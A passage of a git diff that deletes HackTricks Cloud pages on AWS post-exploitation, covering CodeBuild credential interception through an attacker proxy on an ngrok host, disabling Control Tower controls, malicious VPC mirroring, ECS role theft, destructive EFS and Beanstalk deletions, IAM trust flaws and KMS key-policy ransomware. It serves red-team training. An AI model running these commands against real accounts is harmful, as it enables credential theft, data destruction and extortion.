-* An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
-
-
-
-
-
-
-* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
-* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy)
-
-```python
-from mitm import MITM, protocol, middleware, crypto
-
-mitm = MITM(
- host="127.0.0.1",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
-)
-mitm.run()
-```
-
-* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
-
-
-
-{% hint style="warning" %}
-Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
-{% endhint %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
deleted file mode 100644
index 1fa4d4d49..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# AWS - Control Tower Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Control Tower
-
-{% content-ref url="../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md" %}
-[aws-control-tower-enum.md](../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md)
-{% endcontent-ref %}
-
-### Enable / Disable Controls
-
-To further exploit an account, you might need to disable/enable Control Tower controls:
-
-{% code overflow="wrap" %}
-```bash
-aws controltower disable-control --control-identifier --target-identifier
-aws controltower enable-control --control-identifier --target-identifier
-```
-{% endcode %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
deleted file mode 100644
index 51e033417..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
+++ /dev/null
@@ -1,41 +0,0 @@
-# AWS - Malicious VPC Mirror
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!**
-
-Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**.
-
-To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts.
-
-The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible.
-
-For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**.
 The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
deleted file mode 100644
index 096bdaea6..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# AWS - ECS Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## ECS
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-ecs-enum.md" %}
-[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md)
-{% endcontent-ref %}
-
-### Host IAM Roles
-
-In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\
-Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check:
-
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
-
-{% hint style="danger" %}
-Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
-{% endhint %}
-
-### Privesc to node to steal other containers creds & secrets
-
-But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
-
-#### Making containers run in current host
-
-Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container.
-
-```bash
-aws ecs update-container-instances-state \
- --cluster --status DRAINING --container-instances
-```
-
-The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:**
-
-```bash
-aws ecs deregister-container-instance \
- --cluster --container-instance --force
-```
-
-A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this:
-
-```bash
-# Needs: ecs:SubmitTaskStateChange
-aws ecs submit-task-state-change --cluster \
- --status STOPPED --reason "anything" --containers [...]
-
-# Needs: ecs:SubmitContainerStateChange
-aws ecs submit-container-state-change ...
-
-# Needs: ecs:SubmitAttachmentStateChanges
-aws ecs submit-attachment-state-changes ...
-```
-
-### Steal sensitive info from ECR containers
-
-The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them).
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
deleted file mode 100644
index 1a78c9dd2..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
+++ /dev/null
@@ -1,80 +0,0 @@
-# AWS - EFS Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EFS
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-efs-enum.md" %}
-[aws-efs-enum.md](../aws-services/aws-efs-enum.md)
-{% endcontent-ref %}
-
-### `elasticfilesystem:DeleteMountTarget`
-
-An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target.
-
-```sql
-aws efs delete-mount-target --mount-target-id
-```
-
-**Potential Impact**: Disruption of file system access and potential data loss for users or applications.
-
-### `elasticfilesystem:DeleteFileSystem`
-
-An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system.
-
-```perl
-aws efs delete-file-system --file-system-id
-```
-
-**Potential Impact**: Data loss and service disruption for applications using the deleted file system.
-
-### `elasticfilesystem:UpdateFileSystem`
-
-An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion.
-
-```sql
-aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps
-```
-
-**Potential Impact**: Degradation of file system performance or resource exhaustion.
-
-### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint`
-
-An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system.
-
-```arduino
-aws efs create-access-point --file-system-id --posix-user --root-directory
-aws efs delete-access-point --access-point-id
-```
-
-**Potential Impact**: Unauthorized access to the file system, data exposure or modification.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
deleted file mode 100644
index 4856870bc..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
+++ /dev/null
@@ -1,121 +0,0 @@
-# AWS - Elastic Beanstalk Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Elastic Beanstalk
-
-For more information:
-
-{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %}
-[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md)
-{% endcontent-ref %}
-
-### `elasticbeanstalk:DeleteApplicationVersion`
-
-{% hint style="info" %}
-TODO: Test if more permissions are required for this
-{% endhint %}
-
-An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up.
-
-{% code overflow="wrap" %}
-```bash
-aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version
-```
-{% endcode %}
-
-**Potential Impact**: Disruption of application deployment and potential loss of application versions.
-
-### `elasticbeanstalk:TerminateEnvironment`
-
-{% hint style="info" %}
-TODO: Test if more permissions are required for this
-{% endhint %}
-
-An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups.
-
-{% code overflow="wrap" %}
-```bash
-aws elasticbeanstalk terminate-environment --environment-name my-existing-env
-```
-{% endcode %}
-
-**Potential Impact**: Downtime of the application, potential data loss, and disruption of services.
-
-### `elasticbeanstalk:DeleteApplication`
-
-{% hint style="info" %}
-TODO: Test if more permissions are required for this
-{% endhint %}
-
-An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up.
- -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force -``` -{% endcode %} - -**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. - -### `elasticbeanstalk:SwapEnvironmentCNAMEs` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 -``` -{% endcode %} - -**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. - -### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 - -aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag -``` -{% endcode %} - -**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md deleted file mode 100644 index 7a73ed2bd..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md +++ /dev/null @@ -1,130 +0,0 @@ -# AWS - IAM Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information about IAM access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -## Confused Deputy Problem - -If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. - -Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. - -
- -However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. - -Example: - -```json -{ - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Principal": { - "AWS": "Example Corp's AWS Account ID" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "12345" - } - } - } -} -``` - -{% hint style="warning" %} -For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. -{% endhint %} - -### Unexpected Trusts - -#### Wildcard as principal - -```json -{ - "Action": "sts:AssumeRole", - "Effect": "Allow", - "Principal": { "AWS": "*" }, -} -``` - -This policy **allows all AWS** to assume the role. - -#### Service as principal - -```json -{ - "Action": "lambda:InvokeFunction", - "Effect": "Allow", - "Principal": { "Service": "apigateway.amazonaws.com" }, - "Resource": "arn:aws:lambda:000000000000:function:foo" -} -``` - -This policy **allows any account** to configure their apigateway to call this Lambda. - -#### S3 as principal - -```json -"Condition": { -"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, - "StringEquals": { - "aws:SourceAccount": "123456789012" - } -} -``` - -If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. 
- -#### Not supported - -```json -{ - "Effect": "Allow", - "Principal": {"Service": "cloudtrail.amazonaws.com"}, - "Action": "s3:PutObject", - "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" -} -``` - -A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). - -## References - -* [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md deleted file mode 100644 index 18859e4f3..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md +++ /dev/null @@ -1,163 +0,0 @@ -# AWS - KMS Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For more information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Encrypt/Decrypt information - -`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: - -* `fileb://:` Reads the file in binary mode, commonly used for non-text files. -* `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. - -{% hint style="success" %} -Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) -{% endhint %} - -* Using a **symmetric** key - -```bash -# Encrypt data -aws kms encrypt \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -* Using a **asymmetric** key: - -```bash -# Encrypt data -aws kms encrypt \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -### KMS Ransomware - -An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. 
- -Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. - -{% hint style="warning" %} -Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. - -Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). -{% endhint %} - -```bash -# Force policy change -aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ - --policy-name default \ - --policy file:///tmp/policy.yaml \ - --bypass-policy-lockout-safety-check - -{ - "Id": "key-consolepolicy-3", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - } - ] -} -``` - -{% hint style="danger" %} -Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. -{% endhint %} - -
- -### Generic KMS Ransomware - -#### Global KMS Ransomware - -There is another way to perform a global KMS Ransomware, which would involve the following steps: - -* Create a new **key with a key material** imported by the attacker -* **Re-encrypt older data** encrypted with the previous version with the new one. -* **Delete the KMS key** -* Now only the attacker, who has the original key material could be able to decrypt the encrypted data - -### Destroy keys - -```bash -# Destoy they key material previously imported making the key useless -aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab - -# Schedule the destoy of a key (min wait time is 7 days) -aws kms schedule-key-deletion \ - --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ - --pending-window-in-days 7 -``` - -{% hint style="danger" %} -Note that AWS now **prevents the previous actions from being performed from a cross account:** -{% endhint %} - -
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
